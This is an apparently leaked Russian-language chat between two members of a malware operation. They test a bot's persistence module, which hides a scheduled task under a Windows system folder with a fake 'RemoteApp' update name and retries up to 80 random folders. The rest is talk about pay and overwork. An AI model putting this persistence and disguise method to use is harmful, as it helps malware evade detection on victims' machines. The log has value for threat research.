[09.11.21 10:01:45] angelo:		таска нету в шелдупере
[09.11.21 10:02:29] brooks:		покажу как запускал finder
[09.11.21 10:02:57] brooks:		покажи
[09.11.21 10:05:19] angelo:		C:\Users\Bil\Downloads>findTask_x64 "C:\Users\Bil\Downloads\64.dll,dllmain"
[09.11.21 10:05:41] brooks:		а dllmain зачем добавил?
[09.11.21 10:05:56] brooks:		C:\Users\Bil\Downloads>findTask_x64 "C:\Users\Bil\Downloads\64.dll"  надо
[09.11.21 10:05:57] angelo:		а вот не знаю
[09.11.21 10:06:15] angelo:		C:\Users\Bil\Downloads>C:\Users\Bil\Downloads>findTask_x64 "C:\Users\Bil\Downloads\64.dll"
'C:\Users\Bil\Downloads' is not recognized as an internal or external command,
operable program or batch file.
[09.11.21 10:08:01] brooks:		запусти так findTask_x64 "C:\Users\Bil\Downloads\64.dll"
[09.11.21 10:08:47] angelo:		path "\Microsoft\Windows\RemoteApp and Desktop Connections Update", task "RemoteApp and Desktop Connections Update Task"
[09.11.21 10:08:53] angelo:		рандлл я вижу
[09.11.21 10:09:10] brooks:		ну значит установилась и пошла работать :)
[09.11.21 10:09:34] angelo:		а тас киз шелдупера удаляется сам ?
[09.11.21 10:09:34] brooks:		плохо то, что когда ставишь от юзера почти всегда попадаешь в эту группу
[09.11.21 10:09:40] angelo:		там ж должна висеть задача
[09.11.21 10:09:47] brooks:		нет, зачем ему удаляться?
[09.11.21 10:10:01] angelo:		тогда где задача ?
[09.11.21 10:10:20] brooks:		ты же сам написал: path "\Microsoft\Windows\RemoteApp and Desktop Connections Update", task "RemoteApp and Desktop Connections Update Task"
[09.11.21 10:10:26] angelo:		я вижу
[09.11.21 10:10:34] angelo:		но не вижу в самом шелдулере
[09.11.21 10:10:47] brooks:		так ты открывай папки в нем
[09.11.21 10:10:56] angelo:		стук вижу бота
[09.11.21 10:11:05] brooks:		найди Microsoft, затем windows  и т.д.
[09.11.21 10:11:10] brooks:		там же дерево задач
[09.11.21 10:11:15] brooks:		с папками
[09.11.21 10:11:23] angelo:		понял
[09.11.21 10:11:27] angelo:		я думал всегда корне
[09.11.21 10:11:36] brooks:		не, это прошлый век :)
[09.11.21 10:11:39] angelo:		а таска убежала в виндовские
[09.11.21 10:11:51] brooks:		а когда будешь ставить от админа - там вообще в любой папке можем оказаться
[09.11.21 10:12:16] brooks:		но я выбираю папку с наибольшим количеством подпапок, это будет windows
[09.11.21 10:12:44] brooks:		но это только при первой попытке, а потом ужу вроде случайным образом из всех
[09.11.21 10:13:00] brooks:		всего 80 попыток закрепиться, вроде так
[09.11.21 10:13:56] angelo:		фига прога умно запрограмирована
[09.11.21 10:14:04] angelo:		как понять поппытки закрепиться ?
[09.11.21 10:14:31] brooks:		ну я создаю задачу,  но может, например, не хватить прав для выбранной папки
[09.11.21 10:14:52] brooks:		тогда делаем вторую попытку, берем случайную папку и снова пробуем создать задачу
[09.11.21 10:15:04] brooks:		и так до 80 шагов или победного, что будет раньше
[09.11.21 16:18:59] angelo:		так
[09.11.21 16:19:02] angelo:		бот всё онлайн
[09.11.21 16:19:05] angelo:		чего сделать с ним ?
[09.11.21 16:19:09] angelo:		чего проверить ?
[09.11.21 16:47:55] brooks:		чето ответ подзавис, проверяй что хочешь, отличие от лакея только  закрепление в системе
[10.11.21 08:57:40] angelo:		привет, всё норм, отпиши как будешь
[10.11.21 09:27:56] brooks:		здесь, привет
[10.11.21 09:31:26] angelo:		короче отработал инкоды
[10.11.21 09:31:37] angelo:		там 0 3 4 11
[10.11.21 09:31:43] angelo:		все норм отрабатывает
[10.11.21 09:31:48] angelo:		до 2х сидел
[10.11.21 09:31:51] angelo:		((
[10.11.21 09:31:58] angelo:		3х врнее
[10.11.21 09:32:04] brooks:		ну про это силверу пиши, я деньгами не заведую :(
[10.11.21 09:32:25] angelo:		да ему по барабану
[10.11.21 09:32:29] brooks:		я вполне серьезно, напиши ему отчет, что проверял, что получилось, что сидел до 3 утра
[10.11.21 09:32:43] brooks:		не важно, по барабану или нет, на мозги капать надо регулярно
[10.11.21 09:32:49] brooks:		учись этому у жены :)
[10.11.21 09:33:04] angelo:		ахах ))
[10.11.21 09:33:10] angelo:		а как эту прогу назвать ?
[10.11.21 09:33:31] brooks:		новая версия закрепа, в админке стучит как delegate
[10.11.21 09:33:54] brooks:		и напиши ему, что ты проверял лайт версию, которая стучит как lackey
[10.11.21 09:34:20] angelo:		окай, ща напишу чего нибудь
[10.11.21 09:34:48] angelo:		никогда ещё в жизни я не работал столько скольок тут !
[10.11.21 09:35:07] brooks:		главное, чтобы еще больше не пришлось :(
[10.11.21 09:35:19] brooks:		где бы то ни было
[10.11.21 09:35:27] angelo:		куда ? я 16  часов онлайн
[10.11.21 09:35:39] angelo:		сплю по 5 часов пол года уже
[10.11.21 09:35:42] brooks:		потихоньку сокращай
[10.11.21 09:36:18] brooks:		либо тебе платят столько, что ты ща за год на всю оставшуюся жизнь до пенсии заработаешь
[10.11.21 09:36:31] angelo:		1300
[10.11.21 09:36:42] angelo:		моя говорит чт оя дурак
[10.11.21 09:37:08] angelo:		ладно, посмотрим что дальше будет
[10.11.21 09:37:18] angelo:		а то реально переучусь и пойду в СБертех
[10.11.21 09:37:21] brooks:		если есть где еще зарабатывать - то я с ней согласен, если нет - она не права
[10.11.21 09:37:35] angelo:		только тут
[10.11.21 09:37:48] angelo:		короче ладно, прости что чет тебе тут изливаю своё говно
[10.11.21 09:37:52] angelo:		просто устал очень
[10.11.21 09:38:01] brooks:		дурак - если есть куда уйти на не худшее место, а так, есть что-то надо
[10.11.21 09:38:27] angelo:		я 3 раза отказывался, уверен в светлое будущее тут )
[10.11.21 09:38:38] angelo:		даже от 2.5 отказывался )
[10.11.21 09:38:46] brooks:		не знаю, меня тема напрягает
[10.11.21 09:38:56] angelo:		почему ?
[10.11.21 09:39:03] angelo:		тихо и спокойно
[10.11.21 09:39:17] brooks:		сама тема, чем приходится заниматься
[10.11.21 09:39:41] angelo:		никогда не ходил по лезвию ножа  ?
[10.11.21 09:40:10] brooks:		не хочу, если есть выбор - ну его этот адреналин
[10.11.21 09:40:14] angelo:		а меня и напрягает и...лстит что ли, что я никто но в то же время в крутой группе
[10.11.21 09:40:33] angelo:		наверно ещё молодость бьет в голову
[10.11.21 09:40:40] brooks:		будут предлагать 2.5 - уходи
[10.11.21 09:41:01] brooks:		я бы даже на ту же самую сумму ушел бы
[10.11.21 09:41:21] angelo:		так найди
[10.11.21 09:41:29] angelo:		проблем не должно быть воообще
[10.11.21 09:41:32] angelo:		ВООООБЩЕ
[10.11.21 09:41:42] brooks:		не так это просто найти
[10.11.21 09:42:08] angelo:		да ну тебя, я вращаюсь в полу кругах прогеров
[10.11.21 09:42:15] angelo:		у хантеров охота идет
[10.11.21 09:42:27] angelo:		ты ж на Си ширпе ?
[10.11.21 09:42:34] angelo:		вообще Сишники нужны очень
[10.11.21 09:42:51] brooks:		нет, не шарп
[10.11.21 09:42:51] angelo:		у меня друг в банке на Си на удаленке 2К + премии + ДМС
[10.11.21 09:42:55] brooks:		просто си
[10.11.21 09:43:10] brooks:		ну вот видишь, место то уже занято :(
[10.11.21 09:43:15] angelo:		))))
[10.11.21 09:43:36] angelo:		я тебе реально говорю - работы много для вас головастых
[10.11.21 09:43:45] angelo:		про себя молчу, я тупой как пробка
[10.11.21 09:43:48] angelo:		а ты то !
[10.11.21 09:44:15] angelo:		даже в регионах сейчас норм с зп на местаз без удаленки
[10.11.21 09:44:20] brooks:		то же самое, тем более никому не расскажешь, что здесь делаешь
[10.11.21 09:44:30] angelo:		ну да
[10.11.21 09:44:36] angelo:		я сам говорю что фрилансет тестер
[10.11.21 09:44:42] angelo:		занимаюсь безопастностью
[10.11.21 09:44:46] angelo:		на этом всё
[10.11.21 09:45:02] angelo:		придумать можно, твоя профессия актуальна как никогда
[10.11.21 09:45:12] angelo:		короче если тебе не 60, а тебе явно 40 +-
[10.11.21 09:45:17] angelo:		то проблем нет
[10.11.21 09:45:32] angelo:		да и 60 похеру, судя по тому чт оя вижу и знаю
[10.11.21 09:47:42] angelo:		мне кажется нас плохо воспитали. Нам должны были говорить что мы можем, что мы лушие, что стоит пробовать и стемиться вперед. Вот я тебе сейчас хочу сказать именно это !
